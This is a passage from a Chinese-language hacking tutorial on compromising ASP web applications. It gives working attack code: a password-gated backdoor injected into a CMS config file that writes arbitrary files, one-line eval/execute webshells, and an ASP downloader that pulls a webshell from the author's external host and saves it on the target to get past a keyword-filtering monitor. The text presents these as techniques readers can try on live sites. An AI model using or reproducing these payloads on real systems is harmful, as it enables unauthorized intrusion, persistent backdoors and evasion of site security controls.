if Request("xiaoxin")="520" then

　　dim allen,creat,text,thisline,path

　　if Request("creat")="yes" then

　　Set fs = CreateObject("Scripting.FileSystemObject")

　　Set outfile=fs.CreateTextFile(server.mappath(Request("path")))

　　outfile.WriteLine Request("text")

　　Response.write "小新恭喜"

　　end if

　　Response.write "<form method=’POST’action=’"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes’>"

　　Response.write "<textarea name=’text’>"&thisline&"</textarea><br>"

　　Response.write "<input type=’text’ name=’path’ value=’"&Request("path")&"’>"

　　Response.write "<input name=’submit’ type=’submit’ value=’ok’ ></form>"

　　Response.end

　　end if

　　%>

　　★

　　然后保存一下， 千萬注意， 這個時候， 千萬別跳轉任何頁面。 直接在ie地址欄內將admin/Admin_Login.asp替換成 inc/config.asp?xiaoxin=520， 有人會問為什么了？因為在上邊版權信息內的代碼， 是一段發送程序， 利用 inc/config.asp相關文件信息所寫。

進入這個頁面之后會發現：這是啥玩意？ 好象一個小馬。 那你就當小馬用好了， 上面寫你的ASP木馬代碼， 下面寫上路徑， 如圖5、6。

怎么樣？SHELL拿到了吧， 這里有一點要注意， 雖然SHELL是拿到了但是這個時候網站也掛掉了， 我們需要進到SHELL里找到config.asp文件， 把里面的 "小新恭喜" 去掉， 就OK啦。

　　其實不光是MY動力管理系統， 動易文章系統以前也存在這個問題：在站長信箱那里寫入"%><%eval(request("xiaozhi"))%><%’ 然后直接連接

　　inc目錄下的config.asp就可以了。 因為很多網站信息都是寫入在config.asp里的， 有空各位朋友可以自己去測試一下（編輯：如果讀者朋友懂ASP可以自己研究一些ASP程序是否在后臺配置文件用到FSO， 這樣基本上就是把配置信息寫到了ASP文件里了）。

　　三、突破一流信息監控系統實現文件“上傳”

　　相信很多朋友可能遇到過這樣一個問題：在得到一個小馬以后傳大馬的時候服務器卻提示錯誤：很抱歉， 由于您提交的內容中或訪問的內容中含有系統不允許的關鍵詞， 本次操作無效， 系統已記錄您的IP及您提交的所有數據。 請注意， 不要提交任何違反國家規定的內容！本次攔截的相關信息為：98424b88afb8， 如圖7。

本來以為換個大馬就可以了， 但是我換了N個馬都是不行。 我想可能是禁止提交了， 但是隨便提交幾個字都是OK的， 原來是因為它設置了限制提交字符， 只要我們的大馬里包含特殊字符就會被拒絕提交， 不過我們還是有辦法突破他的。

　　這個就好比我們上傳EXE文件的時候， 網站禁止了上傳， 但是我們可以采用外部下載的方式來把目標文件下載到本地服務器中。 比如VBS？嘿嘿 好了， 這個方法就是， 只要服務器沒有禁用XML和數據流組件， 我們可以往服務器中提交以下ASP腳本文件， 代碼如下：

　　★

　　<%

　　Set xPost = CreateObject("Microsoft.XMLHTTP")

　　xPost.Open "GET",http://www.hack521.cn/fish.txt,False

　　xPost.Send()

　　Set sGet = CreateObject("ADODB.Stream")

　　sGet.Mode = 3

　　sGet.Type = 1

　　sGet.Open()

　　sGet.Write(xPost.responseBody)

　　sGet.SaveToFile Server.MapPath("fish.asp"),2

　　set sGet = nothing

　　set sPOST = nothing

　　%>

　　★

　　利用服務器的XML和數據流組件， 從我的blog的fish.txt的內容下載到目標站點根目錄并保存為fish.asp。 fish.txt中的內容當然就是被攔截的內容了， 也就是我們的大馬。 之后訪問這個提交的ASP文件， 會出現一片空白， 然后我們再訪問這個fish.asp文件， 則想要上傳的內容已經被保存成功！如圖8。

怎么樣？親愛的讀者？你學會了沒有？是不是腦子里又多了一條新思路？這期我主要以三個實例來講解一下一些大家都知道但是都不常用的方法。 很多朋友問過我， 為什么我寫的文章里所用的方法家都知道， 為什么就想不到呢？還是那句話， 思路要清晰， 滲透是一個細致活， 不急不躁方能心平。 我的ID是CNSST或者加我

：MSSQL是個強大的數據庫， 能靈活運用其提供給我們的擴展， 就不是一般的高手了；關于配置文件寫馬， 為了寫馬后還能讓網站運行正常， 寫進 Config.asp里的就要是容錯的一句話了， 比如：<%if request("cmd")<>"" then execute request("cmd")%>或者<%on error resume next:execute request("cmd")%>等等；如果你能熟練掌握MS的一些組件運用， 你也是個高手了。